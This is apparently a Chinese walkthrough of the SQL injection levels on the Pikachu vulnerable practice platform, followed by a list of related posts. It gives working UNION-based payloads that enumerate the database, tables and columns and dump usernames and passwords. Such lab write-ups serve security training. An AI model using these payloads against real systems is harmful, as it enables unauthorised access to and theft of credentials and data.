pikachu SQL 注入(皮卡丘漏洞平台通关系列)
一.数字型注入
目录
一.数字型注入
二.字符型注入
在burp抓包
使用reprter注入
- 找列数id=2 order by 2# &submit=%E6%9F%A5%E8%AF%A2,如果猜测的列数大于select语句查询的结果的列数,会返回报错。
- 爆库,id=2 union select database(),2# &submit=%E6%9F%A5%E8%AF%A2,上一步知道了有两列,浏览器的返回结果有用户名和邮箱。当前数据库是pikachu
- 爆表,id=2 union select group_concat(table_name),2 from information_schema.tables where table_schema='pikachu'# &submit=%E6%9F%A5%E8%AF%A2
4.爆列,id=2 union select group_concat(column_name),2 from information_schema.columns where table_name='users' and table_schema='pikachu'# &submit=%E6%9F%A5%E8%AF%A2
- 爆数据,id=2 union select username,password from users# &submit=%E6%9F%A5%E8%AF%A2
二.字符型注入
1.找列数,ccc’ order by 2#
2.爆库,ccc’ union select database(),2#
3.爆表,ccc' union select 1,group_concat(table_name) from information_schema.tables where table_schema = 'pikachu' #
4.爆列,ccc' union select 'aaa', group_concat(column_name) from information_schema.columns where table_name = 'users' and table_schema = 'pikachu' #
5.获取数据信息,ccc' union select username,password from pikachu.users #
pikachu SQL 注入(皮卡丘漏洞平台通关系列)相关推荐
- pikachu SQL注入 (皮卡丘漏洞平台通关系列)
目录 一.官方的戏精引言 二.仙女在认真闯关 一重天 数字型注入 二重天 字符型注入 三重天 搜索型注入 四重天 xx型注入 五重天 insert/update注入 (1)insert注入 (2)up ...
- pikachu File Inclusion 文件包含漏洞 (皮卡丘漏洞平台通关系列)
目录 一.来自官方的简介 二.来自小可爱的通关步骤 第一关 File Inclusion(local) 1.读取"隐藏"文件 2.读取系统文件 3.结合文件上传getshell ...
- pikachu RCE(remote command/code execute)(远程命令执行/远程代码执行)(皮卡丘漏洞平台通关系列)
目录 一.官方介绍 二.诚意推荐 三.悠闲通关 第1关 exec "ping" 第2关 exec "eval" 一.官方介绍 本节引用内容来源pikachu漏洞 ...
- pikachu XXE (XML外部实体注入)(皮卡丘漏洞平台通关系列)
目录 一.来自官方的介绍以及来自民间的扩展 1.pikachu官方简介 2.小女子之前画的脑图 3.两个不错的博客 二.小白菜的闯关 1.查看系统文件内容 2.查看php源代码 3.爆破开放端口 三. ...
- pikachu XSS Cross-Site Scripting(皮卡丘漏洞平台通关系列)
目录 一.听pikachu介绍xss 二.羞耻又走心的推荐 三.比较EASY的闯关 第1关 反射型xss(get) 1.阳关道 2.独木桥 3.第三种方法 第2关 反射型xss(post) 第3关 存 ...
- pikachu Unsafe Fileupload 不安全的文件上传(皮卡丘漏洞平台通关系列)
目录 一.client check 客户端验证 1.现象 2.绕过姿势 方法一.浏览器禁用javascript 方法二.burpsuite抓包改后缀 3.问题分析 二.MIME type 1.现象 2 ...
- pikachu Over permission 越权(皮卡丘漏洞平台通关系列)
目录 1.水平越权 (1)闯关 (2)原因 (3)防御 2.垂直越权 (1)闯关 (2)原因 (3)防御 3.尾声 这关也挺简单 1.水平越权 也称为横向越权,指相同权限下不同的用户可以互相访问,比如 ...
- pikachu 暴力破解 Brute Force(皮卡丘漏洞平台通关系列)
目录 一.官方概述 二.小白菜的通关 第一关 基于表单的暴力破解 第二关 验证码绕过(on server) 1.绕过步骤 2.一点思考 第三关 验证码绕过(on client) 1.绕过步骤 2 ...
- pikachu Unsafe Filedownload 不安全的文件下载 (皮卡丘漏洞平台通关系列)
这关也几乎是一步就能搞定 1.轻松过关 进入本关看到下图的页面,点击球员名字可以下载头像图片 点击之后直接下载了,没有页面跳转,地址栏的url没有变化 右键 查看网页源代码 通过球员名称快速定位到相关 ...
最新文章
- MATLAB编写ode文件,MATLABODE45问题M文件为br/functiondq 爱问知识人
- 全球IPv4地址正式耗尽,你知道吗?
- ai字体行间距怎么调整_字体基础知识(一)
- 计算机辅助普通话水平测试评分办法,计算机辅助普通话水平测试评分试行办法...
- Maven+Mybatis+Spring+SpringMVC实现分页
- Quartz.Net 学习随手记之03 配置文件
- 关于Jbulder2006的问题
- 如何在Python中获取文件创建和修改日期/时间?
- JS、PHP输出语句。
- ArcGIS土地利用重分类(一)简单的reclass by table方法
- FFmpeg合并ts文件为mp4文件
- 微服务Spring Boot 整合 Redis 实现好友关注 – Feed流实现推送到粉丝收件箱
- Creator动态获取,数据文,JSON并使用,枚举Enum,cc.sys.localStorage获取音效的判断 ,冒泡排序做排行榜 ,动态获取提示(cc.loader.loadRes),制作签到
- java 月份适配计算_Java8中的时间日期API这么好用,你居然还没有掌握?
- android 7.0原生room,小米5S 安卓9.0 原生体验 LineageOS16.0 ROOT
- 企业被抽到高新现场审查怎么办?深科信教你做好这些准备
- 企业管理软件如何选型?看完后恍然大悟
- 做网站windows和linux哪个好,做网站永Linux系统服务器到底有什么优势?
- 学英语的网站[转载]
- 台式机键盘鼠标失灵,无法输入密码,无法登陆电脑
热门文章
- Spring Boot配置log4j记录日志
- 计算机里s大小,衣服上的S,M,L代表m或l多大
- python自动翻译excel某一列_python批量将excel内容进行翻译写入功能
- 响应国家十四五规划,ABeam(德硕)科技赋能可靠股份数智化转型
- android常用api大全,Android开发个人总结常用的api
- jquery ready vue_我在切换路由器$(document).ready()失败时在模板中使用vue-router和jQuery...
- K8S报错network is not ready: container runtime network not ready
- 数据分析八大模型:漏斗模型
- 【博学谷学习记录】超强总结,用心分享 | 产品经理之B端相关概念及业务流程设计
- java逆波兰式求值_波兰式、逆波兰式与表达式求值